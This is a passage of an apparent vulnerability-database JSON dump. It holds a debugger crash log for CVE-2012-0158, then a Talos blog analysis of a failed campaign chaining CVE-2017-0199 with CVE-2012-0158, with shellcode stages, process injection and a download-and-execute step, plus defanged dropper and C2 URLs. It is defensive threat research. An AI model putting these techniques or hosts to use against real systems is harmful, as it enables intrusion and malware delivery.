C:\\WINDOWS\\system32\\ole32.dll\n ModLoad: 3a9d0000 3b750000 C:\\Program Files\\Microsoft Office\\Office12\\oart.dll\n ModLoad: 32600000 33618000 C:\\Program Files\\Common Files\\Microsoft Shared\\office12\\mso.dll\n ModLoad: 3fde0000 
40221000 C:\\WINDOWS\\system32\\msi.dll\n ModLoad: 33d00000 33dd7000 C:\\Program Files\\Microsoft Office\\Office12\\1033\\wwintl.dll\n ModLoad: 773d0000 774d3000 C:\\WINDOWS\\WinSxS\\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\\Comctl32.dll\n ModLoad: 77f60000 77fd6000 C:\\WINDOWS\\system32\\SHLWAPI.dll\n ModLoad: 74720000 7476c000 C:\\WINDOWS\\system32\\MSCTF.dll\n ModLoad: 00cc0000 01314000 C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSORES.DLL\n ModLoad: 6bdc0000 6be7a000 C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSPTLS.DLL\n ModLoad: 7c9c0000 7d1d7000 C:\\WINDOWS\\system32\\SHELL32.DLL\n ModLoad: 5d090000 5d12a000 C:\\WINDOWS\\system32\\comctl32.dll\n ModLoad: 01bf0000 025cd000 C:\\Program Files\\Common Files\\Microsoft Shared\\office12\\1033\\MSOINTL.DLL\n ModLoad: 79000000 7904a000 C:\\WINDOWS\\system32\\mscoree.dll\n ModLoad: 603b0000 60416000 C:\\WINDOWS\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\n ModLoad: 77c00000 77c08000 C:\\WINDOWS\\system32\\VERSION.DLL\n ModLoad: 73000000 73026000 C:\\WINDOWS\\system32\\Winspool.DRV\n ModLoad: 7e660000 7e715000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\PS5UI.DLL\n ModLoad: 77120000 771ab000 C:\\WINDOWS\\system32\\OLEAUT32.dll\n ModLoad: 5ad70000 5ada8000 C:\\WINDOWS\\system32\\UxTheme.DLL\n ModLoad: 3a780000 3a889000 C:\\Program Files\\Common Files\\Microsoft Shared\\office12\\riched20.dll\n ModLoad: 76fd0000 7704f000 C:\\WINDOWS\\system32\\CLBCATQ.DLL\n ModLoad: 77050000 77115000 C:\\WINDOWS\\system32\\COMRes.dll\n ModLoad: 78800000 7895c000 C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE11\\msxml5.dll\n ModLoad: 77920000 77a13000 C:\\WINDOWS\\system32\\SETUPAPI.dll\n ModLoad: 02dd0000 03095000 C:\\WINDOWS\\system32\\xpsp2res.dll\n ModLoad: 3bd10000 3bea5000 C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\OGL.DLL\n ModLoad: 76f50000 76f58000 C:\\WINDOWS\\system32\\WTSAPI32.DLL\n ModLoad: 76360000 
76370000 C:\\WINDOWS\\system32\\WINSTA.dll\n ModLoad: 5b860000 5b8b5000 C:\\WINDOWS\\system32\\NETAPI32.dll\n ModLoad: 73ba0000 73bb3000 C:\\WINDOWS\\system32\\sti.dll\n ModLoad: 74ae0000 74ae7000 C:\\WINDOWS\\system32\\CFGMGR32.dll\n ModLoad: 7e1e0000 7e282000 C:\\WINDOWS\\system32\\urlmon.dll\n ModLoad: 6bd10000 6bd24000 C:\\Program Files\\Microsoft Office\\Office12\\MSOHEV.DLL\n ModLoad: 40390000 40446000 C:\\Program Files\\Microsoft Office\\Office12\\msproof6.dll\n ModLoad: 7c420000 7c4a7000 C:\\WINDOWS\\WinSxS\\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.42_x-ww_0de06acd\\MSVCP80.dll\n ModLoad: 7e720000 7e7d0000 C:\\WINDOWS\\system32\\SXS.DLL\n (a7c.b3c): Break instruction exception - code 80000003 (first chance)\n *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\WINDOWS\\system32\\ntdll.dll -\n eax=7ffd9000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005\n eip=7c90120e esp=03f3ffcc ebp=03f3fff4 iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246\n ntdll!DbgBreakPoint:\n 7c90120e cc int 3\n 0:007> g\n ModLoad: 77b40000 77b62000 C:\\WINDOWS\\system32\\appHelp.dll\n ModLoad: 77a20000 77a74000 C:\\WINDOWS\\System32\\cscui.dll\n ModLoad: 76600000 7661d000 C:\\WINDOWS\\System32\\CSCDLL.dll\n ModLoad: 75f80000 7607d000 C:\\WINDOWS\\system32\\browseui.dll\n ModLoad: 76990000 769b5000 C:\\WINDOWS\\system32\\ntshrui.dll\n ModLoad: 76b20000 76b31000 C:\\WINDOWS\\system32\\ATL.DLL\n ModLoad: 769c0000 76a74000 C:\\WINDOWS\\system32\\USERENV.dll\n ModLoad: 7e290000 7e401000 C:\\WINDOWS\\system32\\SHDOCVW.dll\n ModLoad: 77a80000 77b15000 C:\\WINDOWS\\system32\\CRYPT32.dll\n ModLoad: 77b20000 77b32000 C:\\WINDOWS\\system32\\MSASN1.dll\n ModLoad: 754d0000 75550000 C:\\WINDOWS\\system32\\CRYPTUI.dll\n ModLoad: 771b0000 7725a000 C:\\WINDOWS\\system32\\WININET.dll\n ModLoad: 76c30000 76c5e000 C:\\WINDOWS\\system32\\WINTRUST.dll\n ModLoad: 76c90000 76cb8000 
C:\\WINDOWS\\system32\\IMAGEHLP.dll\n ModLoad: 76f60000 76f8c000 C:\\WINDOWS\\system32\\WLDAP32.dll\n ModLoad: 76980000 76988000 C:\\WINDOWS\\system32\\LINKINFO.dll\n ModLoad: 27580000 27685000 C:\\WINDOWS\\system32\\MSCOMCTL.OCX\n ModLoad: 763b0000 763f9000 C:\\WINDOWS\\system32\\comdlg32.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 42640000 426c7000 
C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\PSCRIPT5.DLL\n ModLoad: 73b30000 73b45000 C:\\WINDOWS\\system32\\mscms.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n (a7c.df4): Unknown exception - code e0000002 (first chance)\n ModLoad: 65000000 65278000 C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA6\\VBE6.DLL\n ModLoad: 65300000 65326000 C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA6\\1033\\VBE6INTL.DLL\n (a7c.df4): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\WINDOWS\\system32\\MSCOMCTL.OCX -\n *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files\\Microsoft Office\\Office12\\wwlib.dll -\n eax=001d2d9c ebx=00000000 ecx=000000c4 edx=0237000d esi=0015e484 edi=00000118\n eip=2758fce3 esp=00121d10 ebp=00121d64 iopl=0 nv up ei pl nz na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\n MSCOMCTL!DllGetClassObject+0x8f9f:\n 2758fce3 ff5108 call dword ptr [ecx+8] ds:0023:000000cc=????????\n 0:000> dd ecx\n 000000c4 ???????? ???????? ???????? ????????\n 000000d4 ???????? ???????? ???????? ????????\n 000000e4 ???????? ???????? ???????? ????????\n 000000f4 ???????? ???????? ???????? ????????\n 00000104 ???????? ???????? ???????? ????????\n 00000114 ???????? ???????? ???????? ????????\n 00000124 ???????? ???????? ???????? ????????\n 00000134 ???????? ???????? ???????? 
????????\n \n\nAssessed Attacker Value: 0\n", "cvss3": {}, "published": "2012-08-15T00:00:00", "type": "attackerkb", "title": "Microsoft Windows TabStrip MSCOMCTL.OCX RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2012-1856"], "modified": "2021-07-27T00:00:00", "id": "AKB:4DF5EF01-8CC5-4A65-87F7-E627FAA3F022", "href": "https://attackerkb.com/topics/sFW6MySRX1/microsoft-windows-tabstrip-mscomctl-ocx-rce-vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2017-08-14T18:08:43", "description": "<h3 id=\"h.o562lfhybzl7\">Introduction</h3><br />Since public disclosure in April 2017, <a href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0199\">CVE-2017-0199</a> has been frequently used within malicious Office documents. The vulnerability allows attackers to include Ole2Link objects within RTF documents to launch remote code when HTA applications are opened and parsed by Microsoft Word.<br /><br />In this recent campaign, attackers combined CVE-2017-0199 exploitation with an earlier exploit, <a href=\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158\">CVE-2012-0158</a>, possibly in an attempt to evade user prompts by Word, or to arrive at code execution via a different mechanism. Potentially, this was just a test run of a new concept. 
In any case, the attackers made mistakes which caused the attack to be a lot less effective than it could have been.<br /><br />Analysis of the payload highlights the potential for the Ole2Link exploit to launch other document types, and also demonstrates a lack of rigorous testing procedures by at least one threat actor.<br /><br /> Attackers are obviously trying to find a way around known warning mechanisms alerting users about potential security issues with opened documents. In this blog post we analyse what happens when an attack attempts to combine these two exploits in a single infection chain and fails.<br /> <br /> Although this attack was unsuccessful, it has shown a level of experimentation by attackers seeking to use CVE-2017-0199 as a means to launch additional weaponized file types and avoid user prompts. It may have been an experiment that didn\u2019t quite work out, or it may be an indication of future attacks yet to materialise.<br /><br /><h3 id=\"h.8er5iyy5kysj\">Standard CVE-2017-0199 exploitation</h3><div><br /></div>A typical attack exploiting CVE-2017-0199 consists of an email campaign distributing a malicious RTF document. The vulnerability exists in code that handles Ole2Link embedded objects. 
Including an Ole2Link in an RTF document allows Word to load other, remote documents within the context of Word.<br /><br /><a href=\"https://1.bp.blogspot.com/-NSSI8BOL22s/WZGK-IAegfI/AAAAAAAAAEs/xw2tx8KHcYslKPmxKeenFiTpokqXf82GwCLcBGAs/s1600/image3.png\" imageanchor=\"1\"><img border=\"0\" data-original-height=\"405\" data-original-width=\"720\" height=\"360\" src=\"https://1.bp.blogspot.com/-NSSI8BOL22s/WZGK-IAegfI/AAAAAAAAAEs/xw2tx8KHcYslKPmxKeenFiTpokqXf82GwCLcBGAs/s640/image3.png\" width=\"640\" /></a> <br /><div style=\"text-align: center;\">Standard CVE-2017-0199 flow</div><br />If the remote OLE2Link points to an HTML application file (HTA file type), vulnerable Word and WordPad versions will parse and execute the application even if the user chooses not to allow inclusion of the remote content. A possible sign of exploitation attempt of CVE-2017-0199 is this Word prompt to the user:<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-0VKBqAUUxXM/WZGL-PIwozI/AAAAAAAAAE4/VF47zZTXA1YZRAVvsArdqLXcIPFgd9l_gCLcBGAs/s1600/image13.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"309\" data-original-width=\"1438\" height=\"138\" src=\"https://2.bp.blogspot.com/-0VKBqAUUxXM/WZGL-PIwozI/AAAAAAAAAE4/VF47zZTXA1YZRAVvsArdqLXcIPFgd9l_gCLcBGAs/s640/image13.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Word prompt displayed to the user before potential CVE-2017-0199 exploit attempt</div><div style=\"text-align: center;\"><br /></div><h3 id=\"h.roxzrd10uaho\">Modified CVE-2017-0199 flow</h3><br />In the case of the modified exploit flow we analyzed, the attack started with an email message containing a malicious attachment. The email employed the usual social engineering tricks to entice the user to open and read the attached document. 
Referring to the attachment as a purchase order coming from an unknown \"partner\" is a very common social engineering trick of spammed malware. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-Hw3wXiGOBh8/WZGMKf_qe7I/AAAAAAAAAE8/SyyOcUTNsyETwGzn-JB5K07vMiWb_g8NwCLcBGAs/s1600/image6.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"461\" data-original-width=\"1049\" height=\"280\" src=\"https://3.bp.blogspot.com/-Hw3wXiGOBh8/WZGMKf_qe7I/AAAAAAAAAE8/SyyOcUTNsyETwGzn-JB5K07vMiWb_g8NwCLcBGAs/s640/image6.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Email message launching the modified attack</div><div style=\"text-align: center;\"><br /></div>The document attached to the email message is an RTF file including an Ole2Link to a remote document hosted at hxxp://multplelabs [dot] com/ema/order.doc. In this case, the mime content type of the remote document observed in the packet capture of the attack was not the expected application/hta but rather application/msword which was enough to motivate us to dig a little bit deeper in order to find out what the attackers are trying to achieve. <br /><br />The first surprising thing is that the vulnerable version of Word I used for the analysis crashed before it managed to display the prompt commonly seen with CVE-2017-0199 exploitation. Instead of displaying the prompt, Word started to convert the downloaded document and then hung before eventually crashing with a memory access fault. 
<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-HbxzsVEz4ao/WZGMUkypjfI/AAAAAAAAAFA/rDvvv35sIBQ36bARwkAXWqgXohpFwTtfgCLcBGAs/s1600/image4.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"500\" data-original-width=\"1600\" height=\"200\" src=\"https://4.bp.blogspot.com/-HbxzsVEz4ao/WZGMUkypjfI/AAAAAAAAAFA/rDvvv35sIBQ36bARwkAXWqgXohpFwTtfgCLcBGAs/s640/image4.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Word crashes without the prompt</div><br />The crash was caused not by the first exploit stage using CVE-2017-0199 but rather by the second stage using CVE-2012-0158. Here we see the shellcode embedded into a MSComctlLib.ListViewCtrl.2 ActiveX control, which is a telltale sign of CVE-2012-0158. The shellcode starts with a ROP chain followed by the shellcode which starts executing when the vulnerability is triggered. After the ROP chain sets the right permissions for the memory block containing the rest of the shellcode, the first stage of the shellcode is executed. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-pN1c55UKgmM/WZGMmdWIsPI/AAAAAAAAAFE/1-35-nnX3-QAgbUs5LrtWIQ0A8egO_UxwCLcBGAs/s1600/image5.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"330\" data-original-width=\"1600\" height=\"132\" src=\"https://2.bp.blogspot.com/-pN1c55UKgmM/WZGMmdWIsPI/AAAAAAAAAFE/1-35-nnX3-QAgbUs5LrtWIQ0A8egO_UxwCLcBGAs/s640/image5.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">First stage shellcode for CVE-2012-0158</div><br />This stage is responsible for the application crash. 
The attackers did not seem to have a good quality assurance process or perhaps the technical expertise to understand what will happen if they simply included an automatically generated CVE-2012-0158 exploit in combination with CVE-2017-0199. <br /><br />The shellcode starts with resolving several API addresses, which allow the code to traverse all open files by bruteforcing the handle numbers for open files, starting from zero and increasing the handle number by four for every next open file handle. If the handle exists, the shellcode attempts to check the file size using the GetFileSize API that takes the file handle as the parameter. If the file size is within the expected range the shellcode maps it in memory to perform a file type check. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-Bbadhc3Wgdk/WZGNHxIv82I/AAAAAAAAAFM/JKczbwTVdYIBdFKz5dqgzdmQSHJeWOKswCLcBGAs/s1600/image10.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"875\" data-original-width=\"1537\" height=\"364\" src=\"https://4.bp.blogspot.com/-Bbadhc3Wgdk/WZGNHxIv82I/AAAAAAAAAFM/JKczbwTVdYIBdFKz5dqgzdmQSHJeWOKswCLcBGAs/s640/image10.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Checking the file size and finding file type</div><div style=\"text-align: center;\"><br /></div>The shellcode here incorrectly assumes that if the found file is an RTF file then all the required conditions are met and the identified RTF file must contain the next shellcode stage. Once the shellcode assumes the file size and type requirements are satisfied, it starts to read the mapped file looking for the next stage shellcode marker which is, in our test, never found because the original CVE-2017-0199 exploiting file is still present in memory. This file satisfies both of the conditions searched for by the first stage shellcode. 
Because the CVE-2017-0199 exploit file is opened before the CVE-2012-0158 document, its handle is smaller and the shellcode reads it first. <br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://2.bp.blogspot.com/-g8G1hw8kKnE/WZGNXJFLWDI/AAAAAAAAAFQ/1x9IYMV2TaokHwZXIigam-pqlP8CFPSHwCLcBGAs/s1600/image1.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"681\" data-original-width=\"1567\" height=\"278\" src=\"https://2.bp.blogspot.com/-g8G1hw8kKnE/WZGNXJFLWDI/AAAAAAAAAFQ/1x9IYMV2TaokHwZXIigam-pqlP8CFPSHwCLcBGAs/s640/image1.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">First stage shellcode looking for the next shellcode stage marker</div><div style=\"text-align: center;\"><br /></div>The shellcode searches for the next stage marker 0xfefefefefeffffffff within the wrong document, without correctly handling reads beyond the document length. This eventually causes a memory protection error when it reads memory past the allocated memory blocks. <br /><br />If the attackers had been just a little more technically savvy, they would have realized this problem and could easily have fixed it to make these two exploits work together without the prompt to load the remote content being displayed to the end user. <br /><br />One possible fix involves changing a single byte to make the file size limits a bit stricter, so that the original CVE-2017-0199 file size is excluded. 
The other way, just slightly more complex, is to correctly handle cases when the next stage marker is not found within the RTF and assume that the targeted Word process already has other RTF documents opened which satisfy the file size condition.<br /><br />Interestingly enough, the shellcode in the document containing the CVE-2012-0158 exploit will be successfully executed if there are no other open RTF files so we analyzed the remainder for the sake of completeness. <br /><br /><h3 id=\"h.1g5ixz26t8g5\">Second stage shellcode</h3><br />The second stage shellcode is a bit more complex and starts by finding required API functions within ntdll.dll. The API functions are used to launch an instance of svchost.exe in a suspended state, and to overwrite the original entrypoint with the final \"download and execute\" shellcode stage which eventually launches the executable payload.<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-AnfQd5_svWA/WZGNmak1XLI/AAAAAAAAAFU/6wbz-jBtjZ8ohLdOXbTngOBejGtbex34QCLcBGAs/s1600/image9.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"933\" data-original-width=\"1600\" height=\"372\" src=\"https://3.bp.blogspot.com/-AnfQd5_svWA/WZGNmak1XLI/AAAAAAAAAFU/6wbz-jBtjZ8ohLdOXbTngOBejGtbex34QCLcBGAs/s640/image9.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Finding ntdll.dll APIs to inject the last stage and resume svchost.exe process</div><div style=\"text-align: center;\"><br /></div>The last shellcode stage, injected into svchost.exe uses UrlDownloadToFile API to download an executable file from the command and control server into the temporary files folder with the filename name.exe, and calls the ShellExecute function to launch the final payload. 
<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://4.bp.blogspot.com/-rmR62a5hMwE/WZGN6M2825I/AAAAAAAAAFY/m32luET2apAMuJn9JlJ6ok6NGzdtbG5kACLcBGAs/s1600/image2.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"575\" data-original-width=\"1350\" height=\"272\" src=\"https://4.bp.blogspot.com/-rmR62a5hMwE/WZGN6M2825I/AAAAAAAAAFY/m32luET2apAMuJn9JlJ6ok6NGzdtbG5kACLcBGAs/s640/image2.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Download and execute stage</div><br />The downloaded executable payload is a packed VB dropper which drops an older Ramnit version, but it also runs Lokibot, based on the observed traffic to the command and control server. Ramnit is a well known self-replicating information stealing bot which also includes a rootkit to hide its presence from the user and security products and is already well documented. Further analysis of this particular piece of malware is outside of the scope of this blog post. Despite being older, the Ramnit family is still a commonly encountered malware family by Talos. It is possible that in this case the attackers intended to launch a Lokibot attack but the sample got infected by the Ramnit file infection component along the way. 
<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://1.bp.blogspot.com/-2Zf6yEqOG-c/WZGOMdZbE4I/AAAAAAAAAFc/ilM-fBaodD4DUP7Qg4aR-Une0myDbPfpwCLcBGAs/s1600/image7.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"392\" data-original-width=\"1054\" height=\"238\" src=\"https://1.bp.blogspot.com/-2Zf6yEqOG-c/WZGOMdZbE4I/AAAAAAAAAFc/ilM-fBaodD4DUP7Qg4aR-Une0myDbPfpwCLcBGAs/s640/image7.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">DNS activity for multplelabs.com</div><br />The domain hosting the malware and the command and control server was registered in October 2016 and it is likely a compromised site, although it seems to have been used by some other Lokibot campaigns. The DNS activity for the domain shows two distinct spikes, which likely indicate two unsuccessful spam campaigns as there has been no additional activity to show increase in communication from infected systems to the command and control server. <br /><br />The DNS activity confirms our findings which document the reasons for the attack failure.<br /><h3 id=\"h.via3e3ir4d9t\">Conclusion</h3><br />CVE-2017-0199 is one of the most commonly used vulnerabilities exploited by malicious documents distributed in spamming campaigns. <a href=\"https://www.virusbulletin.com/blog/2017/06/cve-2017-0199-new-cve-2012-0158/\">Previous work</a> indicates that its popularity with attackers overcame the popularity of CVE-2012-0158. <br /><br />In this blog post we analyse what happens when an attack attempts to combine these two exploits in a single infection chain. In the case of this campaign the attackers made a major mistake that prevented the intended download and execution of the Ramnit payload. 
<br /><br /><div class=\"separator\" style=\"clear: both; text-align: center;\"><a href=\"https://3.bp.blogspot.com/-MfUPazA21cA/WZGOZLENF5I/AAAAAAAAAFg/40RcSVXGHtI-2ZXY5APAF5xYKnAQ_CT6gCLcBGAs/s1600/image11.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"405\" data-original-width=\"720\" height=\"360\" src=\"https://3.bp.blogspot.com/-MfUPazA21cA/WZGOZLENF5I/AAAAAAAAAFg/40RcSVXGHtI-2ZXY5APAF5xYKnAQ_CT6gCLcBGAs/s640/image11.png\" width=\"640\" /></a></div><div class=\"separator\" style=\"clear: both; text-align: center;\">Attempted combined attack stages</div><br />One has to wonder why did the attackers use the combination of a newer and an older exploit at all? The combination would not be executed if the targeted system had a patch against either of the exploits. In addition, if the targeted system was vulnerable to CVE-2012-0158 it would be much easier for the attackers to use a single exploit targeting this vulnerability.<br /><br />An assumption we can make is that that the attackers used the combination to avoid Word displaying the prompt which may raise suspicions for the target end user. Another possibility is that they attempted to use this combination in order to avoid behavioral detection systems which may be triggering on the combination of Ole2Link in a word document and a download of an HTA file. <br /><br />This attack was unsuccessful, potentially indicating poor testing or quality control procedures by the attackers. However, this does show a level of experimentation by attackers seeking to use CVE-2017-0199 as a means to launch additional weaponized file types and avoid user prompts. 
This attack may have been an experiment that didn't quite work out, or it may be an indication of future attacks yet to materialise.<br /><br /><h3 id=\"h.8lbs60io8ukk\">Coverage</h3><br /><a href=\"https://4.bp.blogspot.com/-zNZW_D3mzfQ/WZGPG8nwAfI/AAAAAAAAAFo/LxZYPEg5C_oqhE-nw0dPwwHFumoST5yTwCLcBGAs/s1600/image8.png\" imageanchor=\"1\" style=\"clear: left; float: left; margin-bottom: 1em; margin-right: 1em;\"><img border=\"0\" data-original-height=\"336\" data-original-width=\"400\" height=\"268\" src=\"https://4.bp.blogspot.com/-zNZW_D3mzfQ/WZGPG8nwAfI/AAAAAAAAAFo/LxZYPEg5C_oqhE-nw0dPwwHFumoST5yTwCLcBGAs/s320/image8.png\" width=\"320\" /></a>Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br />CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br />Email Security can block malicious emails sent by threat actors as part of their campaign.<br /><br />Network Security appliances such as NGFW, NGIPS, and Meraki MX with Advanced Security can detect malicious activity associated with this threat.<br /><br />AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.<br /><br />Umbrella prevents DNS resolution of the domains associated with malicious activity.<br /><br />Stealthwatch detects network scanning activity, network propagation, and connections to CnC infrastructures, correlating this activity to alert administrators.<br /><h3 id=\"h.3lh94s3hk6jp\">IOCs</h3><br />Documents<br /><br />5ae2f13707ee38e4675ad1bc016b19875ee32312227103d6f202874d8543fc2e - CVE-2017-0199<br />6a84e5fd6c9b2c1685efc7ac8d763048913bad2e767b4958e7b40b4488bacf80 - CVE-2012-0158<br /><br />Executables<br /><br />351aec22d926b4fb7efc7bafae9d1603962cadf0aed1e35b1ab4aad237723474<br />f34e5af97ccb3574f7d5343246138daf979bfd1f9c37590e9a41f6420ddb3bb6<br 
/>43624bf57a9c7ec345d786355bb56ca9f76c226380302855c61277bdc490fdfe<br />d4fbca06989a074133a459c284d79e979293625262a59fbd8b91825dbfbe2a13<br /><br />URLs<br /><br />hxxp://multplelabs[dot]com/ema/order.doc - CVE-2012-0158<br />hxxp://multplelabs[dot]com/ema/nextyl.exe - dropper<br />hxxp://multplelabs[dot]com/freem/50/fre.php - Lokibot C2<br /><br />", "cvss3": {}, "published": "2017-08-14T09:55:00", "title": "When combining exploits for added effect goes wrong", "type": "talosblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-0199"], "modified": "2017-08-14T16:55:34", "id": "TALOSBLOG:EE177479683FB1333547D9FA076F4D46", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/tm25zXE3Ntc/when-combining-exploits-for-added.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2016-12-03T17:44:02", "edition": 2, "description": "This installment shares a study of CVE-2015-1641, a vulnerability whose versatility and stability have put it on course to replace CVE-2012-0158. It is a type confusion bug that gives a write of attacker-controlled data to an arbitrary memory address; combined with a few standard exploitation techniques, that primitive leads to arbitrary code execution. 
